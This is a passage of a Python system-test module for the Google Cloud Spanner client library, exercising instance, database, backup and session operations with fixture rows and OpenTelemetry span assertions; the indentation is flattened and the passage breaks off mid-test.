from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
from tests._fixtures import EMULATOR_DDL_STATEMENTS
from tests._helpers import OpenTelemetryBase, HAS_OPENTELEMETRY_INSTALLED
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
SKIP_BACKUP_TESTS = os.getenv("SKIP_BACKUP_TESTS") is not None
if CREATE_INSTANCE:
INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
INSTANCE_ID = os.environ.get(
"GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
)
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
BASE_ATTRIBUTES = {
"db.type": "spanner",
"db.url": "spanner.googleapis.com",
"net.host.name": "spanner.googleapis.com",
}
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _has_all_ddl(database):
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
return len(database.ddl_statements) == len(ddl_statements)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
if USE_EMULATOR:
from google.auth.credentials import AnonymousCredentials
emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
Config.CLIENT = Client(
project=emulator_project, credentials=AnonymousCredentials()
)
else:
Config.CLIENT = Client()
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
# Delete test instances that are older than an hour.
cutoff = int(time.time()) - 1 * 60 * 60
instance_pbs = Config.CLIENT.list_instances("labels.python-spanner-systests:true")
for instance_pb in instance_pbs:
instance = Instance.from_pb(instance_pb, Config.CLIENT)
if "created" not in instance.labels:
continue
create_time = int(instance.labels["created"])
if create_time > cutoff:
continue
# Instance cannot be deleted while backups exist.
for backup_pb in instance.list_backups():
backup = Backup.from_pb(backup_pb, instance)
backup.delete()
instance.delete()
if CREATE_INSTANCE:
if not USE_EMULATOR:
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if "-us-" in config.name]
if not configs:
raise ValueError("List instance configs failed in module set up.")
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
Config.INSTANCE = Config.CLIENT.instance(
INSTANCE_ID, config_name, labels=labels
)
created_op = Config.INSTANCE.create()
created_op.result(30) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
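
# An illustrative restatement (not used by the tests) of the clean-up rule in
# setUpModule(): a test instance is considered stale, and therefore deletable,
# when its 'created' label -- a unix timestamp string -- is at least an hour old.
def _sketch_is_stale(created_label, now=None, max_age_seconds=60 * 60):
    now = int(time.time()) if now is None else now
    return int(created_label) <= now - max_age_seconds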
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
@unittest.skipIf(
CREATE_INSTANCE, "This test fails when system tests are run in parallel."
)
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (
instance in EXISTING_INSTANCES or instance == Config.INSTANCE
)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(INSTANCE_ID)
# Make sure metadata unset before reloading.
instance.display_name = None
def _expected_display_name(instance):
return instance.display_name == Config.INSTANCE.display_name
retry = RetryInstanceState(_expected_display_name)
retry(instance.reload)()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a second instance object for the same ID and make sure it matches.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
@unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = "Foo Bar Baz"
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
# Create a second instance object for the same ID and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
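# Mixin supplying the shared `contacts` fixture (columns, sample rows, key set,
# query) plus the row/cell comparison helpers used by the test cases below.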
class _TestData(object):
TABLE = "contacts"
COLUMNS = ("contact_id", "first_name", "last_name", "email")
ROW_DATA = (
(1, u"Phred", u"Phlyntstone", u"phred@example.com"),
(2, u"Bharney", u"Rhubble", u"bharney@example.com"),
(3, u"Wylma", u"Phlyntstone", u"wylma@example.com"),
)
ALL = KeySet(all_=True)
SQL = "SELECT * FROM contacts ORDER BY contact_id"
_recurse_into_lists = True
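# Compare a (naive) timestamp that was written against the UTC-aware value
# read back, field by field. Plain datetimes only carry microseconds, so they
# are scaled by 1000 when checking the stored nanosecond component.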
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, DatetimeWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_rows_data(self, rows_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(rows_data), len(expected))
for row, expected in zip(rows_data, expected):
self._check_row_data(row, expected)
def _check_row_data(self, row_data, expected):
self.assertEqual(len(row_data), len(expected))
for found_cell, expected_cell in zip(row_data, expected):
self._check_cell_data(found_cell, expected_cell)
def _check_cell_data(self, found_cell, expected_cell):
if isinstance(found_cell, DatetimeWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
elif isinstance(found_cell, list) and self._recurse_into_lists:
self.assertEqual(len(found_cell), len(expected_cell))
for found_item, expected_item in zip(found_cell, expected_cell):
self._check_cell_data(found_item, expected_item)
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
database_names = [
database.name for database in Config.INSTANCE.list_databases()
]
self.assertTrue(self._db.name in database_names)
def test_create_database(self):
pool = BurstyPool(labels={"testcase": "create_database"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout"
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
# Random but short-ish; prefixed with a letter so the operation ID does not start with a digit.
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(ddl_statements, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name="id_1")
with self.assertRaises(exceptions.AlreadyExists):
self._db.run_in_transaction(_unit_of_work, name="id_1")
self._db.run_in_transaction(_unit_of_work, name="id_2")
with self._db.snapshot() as after:
rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
@unittest.skipIf(SKIP_BACKUP_TESTS, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")
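# setUpClass provisions two databases on the shared instance, plus one extra
# instance using the same config (for cross-instance restore) and, when a
# second "-us-" config is available, one with a different config so that
# restore-across-configs rejection can be exercised.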
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
db1 = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
cls._db = db1
cls._dbs = [db1, db2]
op1 = db1.create()
op2 = db2.create()
op1.result(30) # raises on failure / timeout.
op2.result(30) # raises on failure / timeout.
current_config = Config.INSTANCE.configuration_name
same_config_instance_id = "same-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._same_config_instance = Config.CLIENT.instance(
same_config_instance_id, current_config, labels=labels
)
op = cls._same_config_instance.create()
op.result(30)
cls._instances = [cls._same_config_instance]
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
diff_configs = [
config.name
for config in configs
if "-us-" in config.name and config.name is not current_config
]
cls._diff_config_instance = None
if len(diff_configs) > 0:
diff_config_instance_id = "diff-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._diff_config_instance = Config.CLIENT.instance(
diff_config_instance_id, diff_configs[0], labels=labels
)
op = cls._diff_config_instance.create()
op.result(30)
cls._instances.append(cls._diff_config_instance)
@classmethod
def tearDownClass(cls):
for db in cls._dbs:
db.drop()
for instance in cls._instances:
instance.delete()
def setUp(self):
self.to_delete = []
self.to_drop = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
for doomed in self.to_drop:
doomed.drop()
def test_create_invalid(self):
from datetime import datetime
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow()
expire_time = expire_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_backup_workflow(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(backup_id, database=self._db, expire_time=expire_time)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertEqual(expire_time, backup.expire_time)
self.assertIsNotNone(backup.create_time)
self.assertIsNotNone(backup.size_bytes)
self.assertIsNotNone(backup.state)
# Update with valid argument.
valid_expire_time = datetime.utcnow() + timedelta(days=7)
valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
backup.update_expire_time(valid_expire_time)
self.assertEqual(valid_expire_time, backup.expire_time)
# Restore database to same instance.
restored_id = "restored_db" + unique_resource_id("_")
database = instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_restore_to_diff_instance(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
op = backup.create()
self.to_delete.append(backup)
op.result()
# Restore database to different instance with same config.
restored_id = "restored_db" + unique_resource_id("_")
database = self._same_config_instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_multi_create_cancel_update_error_restore_errors(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
backup1 = instance.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time
)
backup2 = instance.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time
)
# Create two backups.
op1 = backup1.create()
op2 = backup2.create()
self.to_delete.extend([backup1, backup2])
backup1.reload()
self.assertFalse(backup1.is_ready())
backup2.reload()
self.assertFalse(backup2.is_ready())
# Cancel a create operation.
op2.cancel()
self.assertTrue(op2.cancelled())
op1.result()
backup1.reload()
self.assertTrue(backup1.is_ready())
# Update expire time to invalid value.
invalid_expire_time = datetime.now() + timedelta(days=366)
invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
with self.assertRaises(exceptions.InvalidArgument):
backup1.update_expire_time(invalid_expire_time)
# Restore to existing database.
with self.assertRaises(exceptions.AlreadyExists):
self._db.restore(source=backup1)
# Restore to instance with different config.
if self._diff_config_instance is None:
return
new_db = self._diff_config_instance.database("diff_config")
op = new_db.create()
op.result(30)
self.to_drop.append(new_db)
with self.assertRaises(exceptions.InvalidArgument):
new_db.restore(source=backup1)
def test_list_backups(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time_1 = datetime.utcnow() + timedelta(days=21)
expire_time_1 = expire_time_1.replace(tzinfo=UTC)
backup1 = Config.INSTANCE.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time_1
)
expire_time_2 = datetime.utcnow() + timedelta(days=1)
expire_time_2 = expire_time_2.replace(tzinfo=UTC)
backup2 = Config.INSTANCE.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time_2
)
# Create two backups.
op1 = backup1.create()
op1.result()
backup1.reload()
create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
backup2.create()
self.to_delete.extend([backup1, backup2])
# List backups filtered by state.
filter_ = "state:CREATING"
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by backup name.
filter_ = "name:{0}".format(backup_id_1)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by database name.
filter_ = "database:{0}".format(self._dbs[0].name)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by create time.
filter_ = 'create_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by expire time.
filter_ = 'expire_time > "{0}"'.format(
expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by size bytes.
filter_ = "size_bytes < {0}".format(backup1.size_bytes)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups using pagination.
count = 0
for page in instance.list_backups(page_size=1):
count += 1
self.assertEqual(count, 2)
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
(OTHER_NAN,) = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
NUMERIC_1 = decimal.Decimal("0.123456789")
NUMERIC_2 = decimal.Decimal("1234567890")
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
"pkey",
"int_value",
"int_array",
"bool_value",
"bool_array",
"bytes_value",
"bytes_array",
"date_value",
"date_array",
"float_value",
"float_array",
"string_value",
"string_array",
"timestamp_value",
"timestamp_array",
"numeric_value",
"numeric_array",
)
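# The emulator fixtures below mirror the full set minus the trailing NUMERIC
# columns (numeric_value / numeric_array), presumably because the emulator
# used for these tests does not support NUMERIC.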
EMULATOR_ALL_TYPES_COLUMNS = ALL_TYPES_COLUMNS[:-2]
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
AllTypesRowData.__new__.__defaults__ = tuple([None for column in ALL_TYPES_COLUMNS])
EmulatorAllTypesRowData = collections.namedtuple(
"EmulatorAllTypesRowData", EMULATOR_ALL_TYPES_COLUMNS
)
EmulatorAllTypesRowData.__new__.__defaults__ = tuple(
[None for column in EMULATOR_ALL_TYPES_COLUMNS]
)
ALL_TYPES_ROWDATA = (
# all nulls
AllTypesRowData(pkey=0),
# Non-null values
AllTypesRowData(pkey=101, int_value=123),
AllTypesRowData(pkey=102, bool_value=False),
AllTypesRowData(pkey=103, bytes_value=BYTES_1),
AllTypesRowData(pkey=104, date_value=SOME_DATE),
AllTypesRowData(pkey=105, float_value=1.4142136),
AllTypesRowData(pkey=106, string_value=u"VALUE"),
AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
AllTypesRowData(pkey=109, numeric_value=NUMERIC_1),
# empty array values
AllTypesRowData(pkey=201, int_array=[]),
AllTypesRowData(pkey=202, bool_array=[]),
AllTypesRowData(pkey=203, bytes_array=[]),
AllTypesRowData(pkey=204, date_array=[]),
AllTypesRowData(pkey=205, float_array=[]),
AllTypesRowData(pkey=206, string_array=[]),
AllTypesRowData(pkey=207, timestamp_array=[]),
AllTypesRowData(pkey=208, numeric_array=[]),
# non-empty array values, including nulls
AllTypesRowData(pkey=301, int_array=[123, 456, None]),
AllTypesRowData(pkey=302, bool_array=[True, False, None]),
AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
AllTypesRowData(pkey=308, numeric_array=[NUMERIC_1, NUMERIC_2, None]),
)
EMULATOR_ALL_TYPES_ROWDATA = (
# all nulls
EmulatorAllTypesRowData(pkey=0),
# Non-null values
EmulatorAllTypesRowData(pkey=101, int_value=123),
EmulatorAllTypesRowData(pkey=102, bool_value=False),
EmulatorAllTypesRowData(pkey=103, bytes_value=BYTES_1),
EmulatorAllTypesRowData(pkey=104, date_value=SOME_DATE),
EmulatorAllTypesRowData(pkey=105, float_value=1.4142136),
EmulatorAllTypesRowData(pkey=106, string_value=u"VALUE"),
EmulatorAllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
EmulatorAllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
# empty array values
EmulatorAllTypesRowData(pkey=201, int_array=[]),
EmulatorAllTypesRowData(pkey=202, bool_array=[]),
EmulatorAllTypesRowData(pkey=203, bytes_array=[]),
EmulatorAllTypesRowData(pkey=204, date_array=[]),
EmulatorAllTypesRowData(pkey=205, float_array=[]),
EmulatorAllTypesRowData(pkey=206, string_array=[]),
EmulatorAllTypesRowData(pkey=207, timestamp_array=[]),
# non-empty array values, including nulls
EmulatorAllTypesRowData(pkey=301, int_array=[123, 456, None]),
EmulatorAllTypesRowData(pkey=302, bool_array=[True, False, None]),
EmulatorAllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
EmulatorAllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
EmulatorAllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
EmulatorAllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
EmulatorAllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
class TestSessionAPI(OpenTelemetryBase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "session_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
super(TestSessionAPI, self).setUp()
self.to_delete = []
def tearDown(self):
super(TestSessionAPI, self).tearDown()
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
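# With opentelemetry installed, the batch and snapshot above should have
# produced exactly four spans, in order: GetSession, Commit, GetSession,
# and ReadOnlyTransaction.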
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 4)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 2}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"columns": self.COLUMNS,
"table_id": self.TABLE,
}
),
span=span_list[3],
)
def test_batch_insert_then_read_string_array_of_string(self):
table = "string_plus_array_of_string"
columns = ["id", "name", "tags"]
rowdata = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self._check_rows_data(rows, expected=rowdata)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
if USE_EMULATOR:
all_types_columns = EMULATOR_ALL_TYPES_COLUMNS
all_types_rowdata = EMULATOR_ALL_TYPES_ROWDATA
else:
all_types_columns = ALL_TYPES_COLUMNS
all_types_rowdata = ALL_TYPES_ROWDATA
with self._db.batch() as batch:
batch.delete(ALL_TYPES_TABLE, self.ALL)
batch.insert(ALL_TYPES_TABLE, all_types_columns, all_types_rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(ALL_TYPES_TABLE, all_types_columns, self.ALL))
self._check_rows_data(rows, expected=all_types_rowdata)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_batch_insert_w_commit_timestamp(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
table = "users_history"
columns = ["id", "commit_ts", "name", "email", "deleted"]
user_id = 1234
name = "phred"
email = "phred@example.com"
row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, row_data)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self.assertEqual(len(rows), 1)
r_id, commit_ts, r_name, r_email, deleted = rows[0]
self.assertEqual(r_id, user_id)
self.assertEqual(commit_ts, batch.committed)
self.assertEqual(r_name, name)
self.assertEqual(r_email, email)
self.assertFalse(deleted)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Aborted)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
